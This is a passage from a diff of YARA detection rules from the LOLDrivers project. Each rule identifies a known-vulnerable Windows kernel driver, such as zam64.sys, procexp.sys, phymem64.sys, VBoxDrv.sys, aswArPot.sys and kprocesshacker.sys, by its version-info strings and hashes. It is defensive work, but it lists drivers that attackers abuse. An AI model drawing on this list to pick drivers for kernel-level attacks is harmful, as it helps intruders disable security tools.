+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]004e00430048004700420049004f00530032007800360034002e005300590053 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0054004f00530048004900420041002000420049004f00530020005000610063006b006100670065 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]004e00430048004700420049004f00530032007800360034002e005300590053 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200031003900390039002d003200300031003200200054004f0053004800490042004100200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Zemanaltd_Zam_5439 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - zam64.sys, zamguard32.sys, zamguard64.sys"
+		author = "Florian Roth"
+		id = "f35db7b6-8a4b-5c26-9e00-da5c1c7780e8"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11398-L11415"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91"
+		hash = "ab2632a4d93a7f3b7598c06a9fdc773a1b1b69a7dd926bdb7cf578992628e9dd"
+		logic_hash = "d43a364d3f39951140fa3b3395f1d74c306558a6c6946f665873e72377345949"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005a0041004d }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005a0065006d0061006e00610020004c00740064002e }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e00320031002e00360033 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005a0041004d }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]005a0065006d0061006e00610020004c00740064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_30AB : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - procexp.Sys"
+		author = "Florian Roth"
+		id = "cd4dd891-8d86-5afa-83ed-1ad0997608de"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11418-L11437"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "30abc0cc700fdebc74e62d574addc08f6227f9c7177d9eaa8cbc37d5c017c9bb"
+		logic_hash = "7e1f69495559ca298a05ef6fb3817799b09d66013bae574ec585d27ef89b4dcc"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0053007900730069006e007400650072006e0061006c00730020002d0020007700770077002e0073007900730069006e007400650072006e0061006c0073002e0063006f006d }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310031002e00330030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310031002e00330030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00700072006f0063006500780070002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00700072006f0063006500780070002e005300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028004300290020004d002e002000520075007300730069006e006f007600690063006800200031003900390036002d0032003000300038 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Zemanaltd_Zam_DE8F : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - zam64.sys, zamguard32.sys, zamguard64.sys"
+		author = "Florian Roth"
+		id = "245da08c-d629-53cb-83fb-476f4fdd1512"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11440-L11456"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "de8f8006d8ee429b5f333503defa54b25447f4ed6aeade5e4219e23f3473ef1c"
+		logic_hash = "0cb5b26dd0cd26c77df642ea6bfffdcede293cdb1ecc15430241ab538f835162"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005a0041004d }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005a0065006d0061006e00610020004c00740064002e }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e00320030002e003100300034 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005a0041004d }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]005a0065006d0061006e00610020004c00740064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Nvidiacorp_Nvoclocksys_Nvidiasystemutilitydriver_0FC0 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - nvoclock.sys"
+		author = "Florian Roth"
+		id = "00b4e2c2-cb2b-5de7-be7f-67fd1ed5bb1f"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11459-L11478"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "0fc0644085f956706ea892563309ba72f0986b7a3d4aa9ae81c1fa1c35e3e2d3"
+		logic_hash = "be5fef829971251225d9cbb72d173affd394c8cce6116b0b705c4b02409b6096"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004e00560069006400690061002000530079007300740065006d0020005500740069006c0069007400790020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004e0056006900640069006100200043006f00720070002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0033002e00300030002e00300030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0033002e00300030002e00300030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e0076006f0063006c006f0063006b002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004e00560069006400690061002000530079007300740065006d0020005500740069006c0069007400790020004400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e0076006f0063006c006f0063006b002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a9004e0056004900440049004100200043006f00720070002e00200032003000300033002d0032003000300034 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Supermicrocomputerinc_Phymem_Phymem_1963 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - phymem64.sys"
+		author = "Florian Roth"
+		id = "19673477-eb54-52d7-886e-ebf3216aa77b"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11481-L11500"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52"
+		logic_hash = "8f4cdca4c4bc91f216ee3d89093d482d6e56623a159c3eae6debc388cb9d108f"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]007000680079006d0065006d0020004100700070006c00690063006100740069006f006e }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005300750070006500720020004d006900630072006f00200043006f006d00700075007400650072002c00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]007000680079006d0065006d }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]007000680079006d0065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]007000680079006d0065006d002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400280063002900200031003900390033002d00320030003100350020005300750070006500720020004d006900630072006f00200043006f006d00700075007400650072002c00200049006e0063002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_16A2 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - procexp.Sys"
+		author = "Florian Roth"
+		id = "826ee893-06af-5dee-9436-ec3ea7ddd8d9"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11503-L11523"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "16a2e578bc8683f17a175480fea4f53c838cfae965f1d4caa47eaf9e0b3415c1"
+		hash = "98a123b314cba2de65f899cdbfa386532f178333389e0f0fbd544aff85be02eb"
+		logic_hash = "ee91ed74d1577bc881a029a6790de6d41e0b9494bfeeceec4511b3d8b7c5cff2"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0053007900730069006e007400650072006e0061006c00730020002d0020007700770077002e0073007900730069006e007400650072006e0061006c0073002e0063006f006d }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310036002e00340032 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310036002e00340032 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00700072006f0063006500780070002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00700072006f0063006500780070002e005300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028004300290020004d00610072006b002000520075007300730069006e006f007600690063006800200031003900390036002d0032003000320031 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Vektortsecurityservice_Vboxdrv_Antidetectpublic_CFB7 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VBoxDrv.sys"
+		author = "Florian Roth"
+		id = "e80a43d2-d96f-5fed-a5e1-3e1ea617542a"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11526-L11545"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "cfb7af8ac67a379e7869289aeee21837c448ea6f8ab6c93988e7aa423653bd40"
+		logic_hash = "8611a572b8366722e237d622b3701072f564f13a73dd71899dbde6faeab73ef8"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00560065006b0074006f0072002000540031003300200053006500630075007200690074007900200053006500720076006900630065 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0034002e0030002e003100310039003200330030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0034002e0030002e003100310039003200330030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041006e00740069006400650074006500630074002000320030003100390020005000750062006c00690063 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300039002d00320030003100390020004f007200610063006c006500200043006f00720070006f0072006100740069006f006e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Sunmicrosystemsinc_Vboxdrvsys_Sunvirtualbox_R_C894 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VBoxDrv.sys"
+		author = "Florian Roth"
+		id = "b4cef531-b146-5c20-b429-a90beaad5712"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11548-L11567"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "c8940e2e9b069ec94f9f711150b313b437f8429f78d522810601b6ee8b52bada"
+		logic_hash = "4f0a6ffa08a2c219e47c6ae13f6cc6914fe7d0dccb0273bf0905dd9a71eb439f"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530075006e0020004d006900630072006f00730079007300740065006d0073002c00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032002e0034002e007200340037003900370038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032002e0034002e007200340037003900370038 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530075006e0020005600690072007400750061006c0042006f0078 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300039002000530075006e0020004d006900630072006f00730079007300740065006d0073002c00200049006e0063002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Pinduoduoltdcorp_Vboxdrv_Pinduoduosecurevdi_9DAB : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VBoxDrv.sys"
+		author = "Florian Roth"
+		id = "44e2c561-b9f4-5840-9e0c-53ffee5a3bd1"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11570-L11589"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "9dab4b6fddc8e1ec0a186aa8382b184a5d52cfcabaaf04ff9e3767021eb09cf4"
+		logic_hash = "894060011b20c84849499127305d8f1d45621c5893f74d59c9278067a329a4d2"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e00640075006f00640075006f0020004c0074006400200043006f00720070 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e003100330037003900300034 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e003100330037003900300034 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500069006e00640075006f00640075006f00200053006500630075007200650020005600440049 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310035002d0032003000320031002000500069006e00640075006f00640075006f00200043006f00720070006f0072006100740069006f006e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Tgsoftsas_Viragtsys_Viritagentsystem_18DE : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - viragt64.sys"
+		author = "Florian Roth"
+		id = "c3b0b3b0-9281-5d90-bf26-6c4c46c4143b"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11592-L11611"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "18deed37f60b6aa8634dda2565a0485452487d7bce88afb49301a7352db4e506"
+		logic_hash = "d01aeb1783377e6067976e6955e63495706c96c8d6c113b393a47e6fe17992f0"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072004900540020004100670065006e0074002000530079007300740065006d }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0054004700200053006f0066007400200053002e0061002e0073002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]007600690072006100670074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005600690072004900540020004100670065006e0074002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00760069007200610067007400360034002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200054004700200053006f0066007400200053002e0061002e0073002e00200032003000310031002c002000320030003100320020002d0020007700770077002e007400670073006f00660074002e00690074 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Avgtechnologiesczsro_Aswarpotsys_Avginternetsecuritysystem_8CFD : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		author = "Florian Roth"
+		id = "4affbef6-26ac-5087-a881-32fad34fd192"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11614-L11633"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "8cfd5b2102fbc77018c7fe6019ec15f07da497f6d73c32a31f4ba07e67ec85d9"
+		logic_hash = "5bc5d8a6cd02e9a684515ea333084c788353641cb29ff08f18a1066d533cf0ed"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00410056004700200061006e0074006900200072006f006f0074006b00690074 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310039002e0037002e0034003200340036002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310039002e0037002e0034003200340036002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410056004700200049006e007400650072006e00650074002000530065006300750072006900740079002000530079007300740065006d0020 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310039002000410056004700200054006500630068006e006f006c006f006700690065007300200043005a002c00200073002e0072002e006f002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_D5C4 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		author = "Florian Roth"
+		id = "9994e1c0-b86b-578d-8002-554584e1de2b"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11636-L11655"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "d5c4ff35eaa74ccdb80c7197d3d113c9cd38561070f2aa69c0affe8ed84a77c9"
+		logic_hash = "d6ad094f2e26ff574917770a94af31110f2ed68e47ee082ad4adfcd7376679a5"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041007600610073007400200061006e0074006900200072006f006f0074006b00690074 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310038002e0036002e0033003900370039002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310038002e0036002e0033003900370039002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041007600610073007400200041006e00740069007600690072007500730020 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003800200041005600410053005400200053006f006600740077006100720065 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Wj_Kprocesshacker_7021 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - kprocesshacker.sys"
+		author = "Florian Roth"
+		id = "dd2a2bfd-12be-5cdb-8293-c51220015bd9"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11658-L11676"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4"
+		logic_hash = "e5d17a5b57183c3a27815b5b64014e9d95f49129cd451c62380ba8e1b4d25be6"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0077006a00330032 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0033002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0033002e0030 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006b00700072006f0063006500730073006800610063006b00650072002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004c006900630065006e00730065006400200075006e006400650072002000740068006500200047004e0055002000470050004c002c002000760033002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Trendmicroeyes_76E8 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		author = "Florian Roth"
+		id = "2d26b107-7fcb-5acd-94e4-ed18c399ad66"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11679-L11698"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "26f41e4268be59f5de07552b51fa52d18d88be94f8895eb4a16de0f3940cf712"
-		logic_hash = "913dc412be3eaa31903d3fac94e07174789bb746bb382a5f1c08fea50541f6c6"
+		hash = "76e807b6c0214e66455f09a8de8faad40b738982ca84470f0043de0290449524"
+		logic_hash = "0a9822cd471bb7fdaab454e824e31e1dcd685f9226c4fa34af4f13dd228dc97b"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00560065006b0074006f0072002000540031003300200053006500630075007200690074007900200053006500720076006900630065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e003100310039003200330030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e003100310039003200330030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041006e00740069006400650074006500630074002000320030003100380020005000750062006c00690063002000620079002000560065006b0074006f0072002000540031003300200028007200650076002e003000350029 }
